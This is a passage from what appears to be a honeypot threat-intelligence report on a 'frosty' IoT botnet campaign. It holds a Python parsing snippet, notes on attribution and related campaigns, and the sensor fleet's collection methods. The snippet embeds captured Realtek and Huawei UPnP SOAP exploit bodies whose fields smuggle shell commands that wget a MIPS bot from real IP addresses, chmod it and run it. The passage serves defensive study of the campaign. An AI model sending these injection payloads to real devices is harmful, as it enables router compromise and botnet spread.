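REALTEK_BODY = (
    b'<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">'
    b"<NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; "
    b"chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient>"
    b"</m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)
HUAWEI_BODY = (
    b'<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    b'<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    b"<NewStatusURL>$(/bin/busybox wget -g 86.54.82.179 -l /tmp/.frosty.mips -r /bins/frosty.mips; "
    b"/bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)</NewStatusURL>"
    b"<NewDownloadURL>HUAWEIUPNP</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>"
)
BENIGN_BODY = b"<u:Upgrade><NewStatusURL>http://192.0.2.10/status</NewStatusURL></u:Upgrade>"

if __name__ == "__main__":
    for body in (REALTEK_BODY, HUAWEI_BODY, BENIGN_BODY):
        print(extract_drop(body))
```

Run over honeypot or WAF request logs, the `payload_url` field gives you new distribution hosts as soon as the operator rotates them, and counting `tag` values per source IP reproduces the per-exploit conversion view the operator built the selfrep tagging for.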

Related Campaigns and Attribution Notes

The "frosty" binary name and campaign tradecraft do not match any named threat actor in public sources as of 2026-06-21. Relevant comparisons:

VulnCheck "frost" Botnet (Dec 2025)
VulnCheck documented a "frost" botnet (similar name) in December 2025 that uses different C2 infrastructure (87.121.84.52) and a completely different CVE set (15 CVEs including CVE-2023-1389 TP-Link, CVE-2025-2611 ICTBroadcast). IRC C2 with "220 meow :3" banner. Not the same campaign — coincidental naming or separate operator reusing the theme.
Historical Context — CVE-2014-8361 + CVE-2017-17215 Exploit Pair
Akamai SIRT (March 2025) noted this specific CVE pair is the most common exploit combination in IoT botnet binaries, used in 36+ distinct exploit sets across surveyed malware corpora. The FROSTY campaign appears to be a persistent iteration of this well-worn exploitation pattern, distinguished by its binary branding, dual-C2 redundancy, and self-replication tracking.

Collection Methodology

All data in this report was collected organically by the cowrAI distributed honeypot fleet — 36 cowrie 2.9.17 SSH/Telnet honeypots geographically distributed across 7 providers (Cloudzy, Vultr, DigitalOcean, Netcup, TeamBlue, Hetzner, and others). Fleet nodes also run alt-protocol lure daemons including soaplure (ports 7547, 37215, 52869) which captures Huawei and Realtek SOAP exploit attempts.

Payload URLs discovered via the fleet's automated chase-runner were fetched within minutes of first observation. Binaries were detonated in a dedicated QEMU MIPS sandbox with WARP egress (rotating 16-profile pool) for network isolation. Tria.ge behavioral analysis and VirusTotal lookups were performed via the cowrAI dashboard pipeline.

All events are stored in PostgreSQL with Analytics Engine dual-write for aggregation queries. No interaction with victim networks occurred; all data was observed passively from honeypot sensor nodes.